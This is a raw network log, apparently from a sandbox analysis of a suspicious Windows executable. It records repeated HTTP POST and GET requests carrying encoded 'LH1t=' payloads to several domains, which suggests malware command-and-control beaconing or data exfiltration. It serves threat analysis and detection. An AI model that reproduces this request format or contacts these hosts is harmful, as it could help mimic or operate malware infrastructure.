Jan 10, 2025 16:42:42.267117977 CET	918	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:42 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4rXlwdQ%2Fuu%2BFhpHWNz6bcSfJx1zIMr8eC0G2k8i%2FTYhSn29LNDg5ov%2Fyr9eX1v6QMBQOSqQAQm6Zv%2BwcekfONXpkvaktLIFYTTynPSRwoi3dbySzd4TcKmL704OKw296A14%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc748ccc442c0-EWR Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4112&min_rtt=4112&rtt_var=2056&sent=1&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1784&delivery_rate=0&cwnd=210&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	50011	104.21.96.1	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:44.115647078 CET	500	OUT	GET /fqlg/?fpJ=16J40rx8bHP8SV&LH1t=sQl5xb/hmEd8xAHtTI1KHbGKQqXRWyiPcilbd3ItRgiyLzuJnGXHmeDa2L3hm4hwlRjcRzlrASDvZ0AcIwfIw2xcCS/Bf2EkC2YHKHBr1XB8+HfoqQxFz1dUuY8R8/C0UQ== HTTP/1.1 Host: www.aonline.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:42:44.704507113 CET	927	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:44 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WM%2FzxKLKz7ZsEziDj9viEo15QHYQeD7E1lwJQEueRwfpOytUhNlonOe0vaG6WDwqEsXnjgas%2F%2FHIDAjlvvfDaTyu7XPrkAHt659BXRGRgNKuCgTuyUYQmi%2F7vzqtav2GytU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ffdc75848534363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1550&min_rtt=1550&rtt_var=775&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=500&delivery_rate=0&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	50012	209.74.79.42	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:49.793512106 CET	750	OUT	POST /o8f4/ HTTP/1.1 Host: www.glowups.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.glowups.life Referer: http://www.glowups.life/o8f4/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 6c 71 77 4b 6c 30 76 36 42 74 52 51 74 68 6f 53 43 46 41 62 35 68 62 41 36 42 46 31 65 7a 68 70 57 52 69 2b 59 41 34 6b 62 59 4d 48 73 52 51 54 76 4c 61 6a 34 2b 72 73 73 33 4b 41 63 55 52 58 41 79 45 6f 65 4d 78 4e 4c 77 51 65 57 2b 32 38 58 65 7a 6b 41 36 45 35 64 32 37 54 50 54 59 57 35 36 42 64 4e 6e 6d 51 61 51 43 73 5a 35 35 67 4e 37 30 56 6c 66 6e 4d 7a 6a 33 59 6e 41 68 54 77 31 71 4f 65 63 6d 39 4e 62 59 45 6c 7a 5a 72 4a 7a 34 57 51 39 64 4f 51 38 47 75 70 2b 6e 56 61 36 30 75 2f 42 41 34 76 30 43 52 58 2f 4a 51 48 44 31 50 48 47 34 35 67 2b 62 50 4f 37 69 7a 71 69 71 61 71 6d 41 3d Data Ascii: LH1t=lqwKl0v6BtRQthoSCFAb5hbA6BF1ezhpWRi+YA4kbYMHsRQTvLaj4+rss3KAcURXAyEoeMxNLwQeW+28XezkA6E5d27TPTYW56BdNnmQaQCsZ55gN70VlfnMzj3YnAhTw1qOecm9NbYElzZrJz4WQ9dOQ8Gup+nVa60u/BA4v0CRX/JQHD1PHG45g+bPO7izqiqaqmA=
Jan 10, 2025 16:42:50.364763021 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:50 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	50013	209.74.79.42	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:52.343151093 CET	770	OUT	POST /o8f4/ HTTP/1.1 Host: www.glowups.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.glowups.life Referer: http://www.glowups.life/o8f4/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 6c 71 77 4b 6c 30 76 36 42 74 52 51 73 43 67 53 4e 44 49 62 2b 42 62 50 6b 78 46 31 45 44 68 6c 57 52 2b 2b 59 42 39 2f 62 71 34 48 73 30 73 54 73 4f 75 6a 31 65 72 73 6b 58 4b 46 59 55 52 4d 41 79 49 67 65 4a 4a 4e 4c 77 73 65 57 2f 47 38 58 4e 62 6e 41 71 45 37 57 57 37 56 53 44 59 57 35 36 42 64 4e 6e 79 2b 61 51 61 73 59 49 4a 67 4d 66 68 6e 6d 66 6e 4c 30 6a 33 59 6a 41 67 55 77 31 71 67 65 5a 2b 48 4e 65 63 45 6c 7a 70 72 49 69 34 5a 65 39 64 49 50 73 48 41 36 72 36 39 5a 36 59 42 2f 69 73 35 67 46 50 72 66 70 34 36 64 68 39 4a 45 47 51 53 67 39 7a 35 4c 4d 2f 62 77 42 36 71 30 78 56 50 79 5a 63 62 54 52 76 46 78 52 32 4f 57 5a 56 57 74 79 72 45 Data Ascii: LH1t=lqwKl0v6BtRQsCgSNDIb+BbPkxF1EDhlWR++YB9/bq4Hs0sTsOuj1erskXKFYURMAyIgeJJNLwseW/G8XNbnAqE7WW7VSDYW56BdNny+aQasYIJgMfhnmfnL0j3YjAgUw1qgeZ+HNecElzprIi4Ze9dIPsHA6r69Z6YB/is5gFPrfp46dh9JEGQSg9z5LM/bwB6q0xVPyZcbTRvFxR2OWZVWtyrE
Jan 10, 2025 16:42:52.928463936 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:52 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	50014	209.74.79.42	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:54.892805099 CET	1787	OUT	POST /o8f4/ HTTP/1.1 Host: www.glowups.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 1241 Origin: http://www.glowups.life Referer: http://www.glowups.life/o8f4/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 6c 71 77 4b 6c 30 76 36 42 74 52 51 73 43 67 53 4e 44 49 62 2b 42 62 50 6b 78 46 31 45 44 68 6c 57 52 2b 2b 59 42 39 2f 62 71 67 48 73 68 67 54 75 74 32 6a 30 65 72 73 34 48 4b 45 59 55 51 63 41 79 67 65 65 4a 4e 37 4c 31 67 65 57 64 4f 38 47 73 62 6e 56 61 45 37 5a 32 37 55 50 54 5a 4d 35 36 78 52 4e 6e 69 2b 61 51 61 73 59 4c 68 67 4c 4c 31 6e 71 2f 6e 4d 7a 6a 33 75 6e 41 67 77 77 31 7a 64 65 5a 4c 34 4f 71 6f 45 6c 54 35 72 4c 55 6b 5a 53 39 64 4b 4f 73 48 75 36 72 2b 69 5a 36 45 33 2f 6a 5a 63 67 43 4c 72 4f 74 52 2b 4f 78 42 72 54 6e 49 6e 6e 64 48 4b 4e 4d 66 37 2f 48 75 36 38 77 45 72 79 64 49 50 55 51 7a 2b 37 43 7a 77 4f 34 4e 47 6f 33 69 77 53 54 6c 42 46 7a 4b 48 52 43 56 69 71 6f 4f 61 47 77 47 4b 43 48 38 43 4c 50 50 4a 4a 61 49 4b 50 63 69 76 62 5a 7a 54 39 4b 69 68 41 52 72 4e 64 65 33 33 2f 53 56 38 58 6a 7a 41 68 49 38 42 76 41 74 51 4f 68 35 68 55 70 7a 4c 6b 4d 46 4c 76 6d 47 4a 64 45 39 77 35 46 41 61 54 6f 35 51 79 2b 49 46 4d 44 6c 37 6c 5a 42 37 6f 53 35 41 67 [TRUNCATED] Data Ascii: LH1t=lqwKl0v6BtRQsCgSNDIb+BbPkxF1EDhlWR++YB9/bqgHshgTut2j0ers4HKEYUQcAygeeJN7L1geWdO8GsbnVaE7Z27UPTZM56xRNni+aQasYLhgLL1nq/nMzj3unAgww1zdeZL4OqoElT5rLUkZS9dKOsHu6r+iZ6E3/jZcgCLrOtR+OxBrTnInndHKNMf7/Hu68wErydIPUQz+7CzwO4NGo3iwSTlBFzKHRCViqoOaGwGKCH8CLPPJJaIKPcivbZzT9KihARrNde33/SV8XjzAhI8BvAtQOh5hUpzLkMFLvmGJdE9w5FAaTo5Qy+IFMDl7lZB7oS5AgeyBoI4FT+W5PeyIyj0jrIBEKtP8xSp7u8awQR6V2hm685ETYp0itnZvk17iBTi6AFbx8JGJeW80pn3gk1QsVODkSzvUWLlYfnhcgvd84InwMHjjKbs4vtSZQWk6cf/j0n4JwWiksLFLKhazdgHq7a897ONBX5iXdc6ATLgt1Nq/ZUAZKYiSyG7D+8S2fO06maptAkU51pTBcnPLlK6w8GEkTPk2MSKVX//v79mKyo6BGaOgRJFVEgajF6r6J9oatXefO60a4e7mWzH1bHutHShJ1l3lW80aS7tWXVp2oGhFW8f1/gOhC2RT5N0av76y7sehHI86ehQ3MQs/b6hnJHT/NWH+WjX5P5s2Ej5iHt05KEYVQKEYBH6FbY0JSWvPaJdo5MGPoFgvaMY/YeaF3se4gj5mDy/dE4+l3+OxIdW9ys4nLkIl02t4Swo23RtSqRpoYmr6LvmxHBtuRIEteLoqccDnXDoGbfYqC7Tr2yuFvvyV+Etvfdjja2QY7Sol4ufrzCTiLh6i7rbIOr1awY7cWAX9GqHi93OXI/H+gHKi5/iXUS2n3OZewS6C+YWCIIYpE1Dob+XHEAw1xBgOxnisJ9yQE7wQCeByvyYd2vi0jmyya5+v7ihDVmPvxy9TfZiUqd3U3STCNrq6tRoYK9XTtUuw/jfmiNf [TRUNCATED]
Jan 10, 2025 16:42:55.473339081 CET	533	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:55 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	50015	209.74.79.42	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:42:57.453388929 CET	501	OUT	GET /o8f4/?LH1t=ooYqmC70ddwRtjg3e0x/wm7MwA1QQXIhRwSAdjgleoIh7kpuh6601uPN4XSsVUJuDgsJSN1iGUsKc/iLAYfhEKljCnL7CTlrze1oMQe9C3qLUpJZMYh8lsz5yyHVqSNemw==&fpJ=16J40rx8bHP8SV HTTP/1.1 Host: www.glowups.life Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile
Jan 10, 2025 16:42:58.069431067 CET	548	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:42:57 GMT Server: Apache Content-Length: 389 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED] Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	50016	192.186.57.30	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:03.483990908 CET	738	OUT	POST /i75c/ HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 205 Origin: http://www.yxni.vip Referer: http://www.yxni.vip/i75c/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 33 61 42 76 75 44 6c 31 4d 79 70 62 78 67 69 2f 54 32 63 44 7a 30 77 6b 7a 77 37 78 2f 69 31 6b 38 38 68 34 77 48 55 45 59 42 31 33 6d 42 76 57 51 44 2b 4d 5a 6f 76 62 77 66 56 73 66 4d 6d 4f 6c 30 2b 35 31 59 55 66 70 37 69 2f 7a 53 4f 34 32 39 44 78 34 55 45 32 4a 2b 44 6e 59 2f 71 2f 55 59 6c 58 59 68 68 4a 66 4d 41 64 6d 34 7a 31 47 35 76 6b 4e 59 50 35 53 4a 38 76 7a 38 36 71 72 39 4a 56 37 49 78 33 77 36 78 41 4d 6d 31 36 43 4b 34 38 43 2b 6e 43 37 57 30 62 62 44 2b 2f 73 53 49 33 37 79 65 6a 6c 63 75 54 50 44 61 62 50 51 46 36 77 34 6f 79 63 6a 32 62 53 65 48 51 6f 4a 69 6e 4d 43 67 3d Data Ascii: LH1t=3aBvuDl1Mypbxgi/T2cDz0wkzw7x/i1k88h4wHUEYB13mBvWQD+MZovbwfVsfMmOl0+51YUfp7i/zSO429Dx4UE2J+DnY/q/UYlXYhhJfMAdm4z1G5vkNYP5SJ8vz86qr9JV7Ix3w6xAMm16CK48C+nC7W0bbD+/sSI37yejlcuTPDabPQF6w4oycj2bSeHQoJinMCg=
Jan 10, 2025 16:43:04.411766052 CET	407	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 15:43:03 GMT Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p mod_fcgid/2.3.9a Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.8	50017	192.186.57.30	80	3572	C:\Program Files (x86)\RXKfCAmDfVjAnKHKLnMXSDBuqmtIWilLkGtqIzhpEmeyAeEKDhbjapRgBiuACXBXWhhOheE\IBBkYiJCUMDfM.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 16:43:06.042838097 CET	758	OUT	POST /i75c/ HTTP/1.1 Host: www.yxni.vip Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Connection: close Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 225 Origin: http://www.yxni.vip Referer: http://www.yxni.vip/i75c/ User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.2; en-US; GT-S7562) U2/1.0.0 UCBrowser/10.1.2.571 U2/1.0.0 Mobile Data Raw: 4c 48 31 74 3d 33 61 42 76 75 44 6c 31 4d 79 70 62 77 41 79 2f 53 56 45 44 37 30 77 6c 74 67 37 78 32 43 31 67 38 38 74 34 77 43 30 55 5a 7a 68 33 6e 67 66 57 4b 43 2b 4d 61 6f 76 62 6f 76 56 6c 52 73 6e 6a 6c 30 79 78 31 5a 6f 66 70 2f 4b 2f 7a 57 43 34 71 63 44 32 2b 55 46 51 45 65 44 6c 57 66 71 2f 55 59 6c 58 59 68 45 6b 66 4d 59 64 6c 4c 37 31 46 62 58 72 41 34 50 36 47 5a 38 76 34 63 36 32 72 39 4a 7a 37 4a 73 2f 77 34 35 41 4d 6e 46 36 4d 34 51 2f 4a 2b 6e 41 6b 47 31 76 53 54 2f 53 74 69 34 32 38 7a 6d 51 35 76 47 34 48 56 72 78 56 79 4e 38 7a 34 41 5a 63 67 65 74 58 70 61 34 79 71 79 58 53 56 32 78 36 58 33 41 71 75 4e 77 37 59 2b 33 37 64 62 7a 67 4d 58 4b Data Ascii: 